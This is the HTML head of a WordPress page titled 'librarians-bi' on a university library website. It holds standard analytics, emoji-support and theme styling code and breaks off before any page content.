CINXE.COM
librarians-bi – ptsl
<!DOCTYPE html> <html class="html" lang="en-US"> <head> <meta charset="UTF-8"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>librarians-bi – ptsl</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//use.fontawesome.com' /> <link rel="alternate" type="application/rss+xml" title="ptsl » Feed" href="https://www.ukm.my/ptsl/?feed=rss2" /> <link rel="alternate" type="application/rss+xml" title="ptsl » Comments Feed" href="https://www.ukm.my/ptsl/?feed=comments-rss2" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v9.2.2 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script src="//www.googletagmanager.com/gtag/js?id=G-C4EM2W17NL" data-cfasync="false" data-wpfc-render="false" async></script> <script data-cfasync="false" data-wpfc-render="false"> var mi_version = '9.2.2'; var mi_track_user = true; var mi_no_track_reason = ''; var MonsterInsightsDefaultLocations = {"page_location":"https:\/\/www.ukm.my\/ptsl\/?page_id=378"}; if ( typeof MonsterInsightsPrivacyGuardFilter === 'function' ) { var MonsterInsightsLocations = (typeof MonsterInsightsExcludeQuery === 'object') ? MonsterInsightsPrivacyGuardFilter( MonsterInsightsExcludeQuery ) : MonsterInsightsPrivacyGuardFilter( MonsterInsightsDefaultLocations ); } else { var MonsterInsightsLocations = (typeof MonsterInsightsExcludeQuery === 'object') ? MonsterInsightsExcludeQuery : MonsterInsightsDefaultLocations; } var disableStrs = [ 'ga-disable-G-C4EM2W17NL', ]; /* Function to detect opted out users */ function __gtagTrackerIsOptedOut() { for (var index = 0; index < disableStrs.length; index++) { if (document.cookie.indexOf(disableStrs[index] + '=true') > -1) { return true; } } return false; } /* Disable tracking if the opt-out cookie exists. */ if (__gtagTrackerIsOptedOut()) { for (var index = 0; index < disableStrs.length; index++) { window[disableStrs[index]] = true; } } /* Opt-out function */ function __gtagTrackerOptout() { for (var index = 0; index < disableStrs.length; index++) { document.cookie = disableStrs[index] + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStrs[index]] = true; } } if ('undefined' === typeof gaOptout) { function gaOptout() { __gtagTrackerOptout(); } } window.dataLayer = window.dataLayer || []; window.MonsterInsightsDualTracker = { helpers: {}, trackers: {}, }; if (mi_track_user) { function __gtagDataLayer() { dataLayer.push(arguments); } function __gtagTracker(type, name, parameters) { if (!parameters) { parameters = {}; } if (parameters.send_to) { __gtagDataLayer.apply(null, arguments); return; } if (type === 'event') { parameters.send_to = monsterinsights_frontend.v4_id; var hookName = name; if (typeof parameters['event_category'] !== 'undefined') { hookName = parameters['event_category'] + ':' + name; } if (typeof MonsterInsightsDualTracker.trackers[hookName] !== 'undefined') { MonsterInsightsDualTracker.trackers[hookName](parameters); } else { __gtagDataLayer('event', name, parameters); } } else { __gtagDataLayer.apply(null, arguments); } } __gtagTracker('js', new Date()); __gtagTracker('set', { 'developer_id.dZGIzZG': true, }); if ( MonsterInsightsLocations.page_location ) { __gtagTracker('set', MonsterInsightsLocations); } __gtagTracker('config', 'G-C4EM2W17NL', {"forceSSL":"true","link_attribution":"true"} ); window.gtag = __gtagTracker; (function () { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ /* ga and __gaTracker compatibility shim. */ var noopfn = function () { return null; }; var newtracker = function () { return new Tracker(); }; var Tracker = function () { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = function () { var args = Array.prototype.slice.call(arguments); args.unshift('send'); __gaTracker.apply(null, args); }; var __gaTracker = function () { var len = arguments.length; if (len === 0) { return; } var f = arguments[len - 1]; if (typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function') { if ('send' === arguments[0]) { var hitConverted, hitObject = false, action; if ('event' === arguments[1]) { if ('undefined' !== typeof arguments[3]) { hitObject = { 'eventAction': arguments[3], 'eventCategory': arguments[2], 'eventLabel': arguments[4], 'value': arguments[5] ? arguments[5] : 1, } } } if ('pageview' === arguments[1]) { if ('undefined' !== typeof arguments[2]) { hitObject = { 'eventAction': 'page_view', 'page_path': arguments[2], } } } if (typeof arguments[2] === 'object') { hitObject = arguments[2]; } if (typeof arguments[5] === 'object') { Object.assign(hitObject, arguments[5]); } if ('undefined' !== typeof arguments[1].hitType) { hitObject = arguments[1]; if ('pageview' === hitObject.hitType) { hitObject.eventAction = 'page_view'; } } if (hitObject) { action = 'timing' === arguments[1].hitType ? 'timing_complete' : hitObject.eventAction; hitConverted = mapArgs(hitObject); __gtagTracker('event', action, hitConverted); } } return; } function mapArgs(args) { var arg, hit = {}; var gaMap = { 'eventCategory': 'event_category', 'eventAction': 'event_action', 'eventLabel': 'event_label', 'eventValue': 'event_value', 'nonInteraction': 'non_interaction', 'timingCategory': 'event_category', 'timingVar': 'name', 'timingValue': 'value', 'timingLabel': 'event_label', 'page': 'page_path', 'location': 'page_location', 'title': 'page_title', 'referrer' : 'page_referrer', }; for (arg in args) { if (!(!args.hasOwnProperty(arg) || !gaMap.hasOwnProperty(arg))) { hit[gaMap[arg]] = args[arg]; } else { hit[arg] = args[arg]; } } return hit; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = newtracker; __gaTracker.getByName = newtracker; __gaTracker.getAll = function () { return []; }; __gaTracker.remove = noopfn; __gaTracker.loaded = true; window['__gaTracker'] = __gaTracker; })(); } else { console.log(""); (function () { function __gtagTracker() { return null; } window['__gtagTracker'] = __gtagTracker; window['gtag'] = __gtagTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.ukm.my\/ptsl\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); </script> <link rel='stylesheet' id='hfe-widgets-style-css' href='https://www.ukm.my/ptsl/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6.46' media='all' /> <style id='wp-emoji-styles-inline-css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style id='classic-theme-styles-inline-css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='wpah-front-styles-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/css/wp-accessibility-helper.min.css?ver=0.5.9.4' media='all' /> <link rel='stylesheet' id='wpvrfontawesome-css' href='https://use.fontawesome.com/releases/v6.5.1/css/all.css?ver=8.5.8' media='all' /> <link rel='stylesheet' id='panellium-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/css/pannellum.css?ver=1' media='all' /> <link rel='stylesheet' id='videojs-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/css/video-js.css?ver=1' media='all' /> <link rel='stylesheet' id='videojs-vr-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.css?ver=1' media='all' /> <link rel='stylesheet' id='owl-css-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/css/owl.carousel.css?ver=8.5.8' media='all' /> <link rel='stylesheet' id='wpvr-css' href='https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/css/wpvr-public.css?ver=8.5.8' media='all' /> <link rel='stylesheet' id='eac-frontend-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/css/eac-frontend.min.css?ver=2.2.8' media='all' /> <link rel='stylesheet' id='eac-fancybox-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/css/jquery.fancybox.min.css?ver=3.5.7' media='print' onload="this.onload=null;this.media='all'" /> <link rel='stylesheet' id='hfe-style-css' href='https://www.ukm.my/ptsl/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=1.6.46' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.32.0' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='swiper-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5' media='all' /> <link rel='stylesheet' id='e-swiper-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='elementor-post-9-css' href='https://www.ukm.my/ptsl/wp-content/uploads/elementor/css/post-9.css?ver=1726017316' media='all' /> <link rel='stylesheet' id='cpel-language-switcher-css' href='https://www.ukm.my/ptsl/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.min.css?ver=2.4.5' media='all' /> <link rel='stylesheet' id='widget-image-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-heading-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-text-editor-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-social-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='e-apple-webkit-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/conditionals/apple-webkit.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='widget-divider-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-divider.min.css?ver=3.25.9' media='all' /> <link rel='stylesheet' id='elementor-post-378-css' href='https://www.ukm.my/ptsl/wp-content/uploads/elementor/css/post-378.css?ver=1732069765' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/fonts/fontawesome/css/all.min.css?ver=6.4.2' media='all' /> <link rel='stylesheet' id='simple-line-icons-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/css/third/simple-line-icons.min.css?ver=2.4.0' media='all' /> <link rel='stylesheet' id='oceanwp-style-css' href='https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/css/style.min.css?ver=4.0.2' media='all' /> <link rel='stylesheet' id='hfe-icons-list-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.3' media='all' /> <link rel='stylesheet' id='hfe-social-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24.0' media='all' /> <link rel='stylesheet' id='hfe-social-share-icons-brands-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='hfe-social-share-icons-fontawesome-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='hfe-nav-menu-icons-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='eael-general-css' href='https://www.ukm.my/ptsl/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/css/view/general.min.css?ver=6.0.10' media='all' /> <link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPlayfair+Display%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPT+Sans+Caption%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPT+Sans%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.1' media='all' /> <link rel='stylesheet' id='elementor-icons-shared-0-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-brands-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-solid-css' href='https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3' media='all' /> <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><!--n2css--><!--n2js--><script src="https://www.ukm.my/ptsl/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=9.2.2" id="monsterinsights-frontend-script-js" async data-wp-strategy="async"></script> <script data-cfasync="false" data-wpfc-render="false" id='monsterinsights-frontend-script-js-extra'>var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"https:\/\/www.ukm.my\/ptsl","hash_tracking":"false","v4_id":"G-C4EM2W17NL"};</script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/pannellum.js?ver=1" id="panellium-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/libpannellum.js?ver=1" id="panelliumlib-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/video.js?ver=1" id="videojs-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1" id="videojsvr-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/lib/pannellum/src/js/videojs-pannellum-plugin.js?ver=1" id="panelliumvid-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/owl.carousel.js?ver=6.7.1" id="owl-js-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/jquery.cookie.js?ver=1" id="jquery_cookie-js"></script> <link rel="https://api.w.org/" href="https://www.ukm.my/ptsl/index.php?rest_route=/" /><link rel="alternate" title="JSON" type="application/json" href="https://www.ukm.my/ptsl/index.php?rest_route=/wp/v2/pages/378" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.ukm.my/ptsl/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.1" /> <link rel="canonical" href="https://www.ukm.my/ptsl/?page_id=378" /> <link rel='shortlink' href='https://www.ukm.my/ptsl/?p=378' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://www.ukm.my/ptsl/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fwww.ukm.my%2Fptsl%2F%3Fpage_id%3D378" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://www.ukm.my/ptsl/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fwww.ukm.my%2Fptsl%2F%3Fpage_id%3D378&format=xml" /> <meta name="generator" content="Elementor 3.25.9; features: additional_custom_breakpoints, e_optimized_control_loading; settings: css_print_method-external, google_font-enabled, font_display-auto"> <style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style> .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } @media screen and (max-height: 1024px) { .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } @media screen and (max-height: 640px) { .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } </style> <style id="wp-custom-css"> 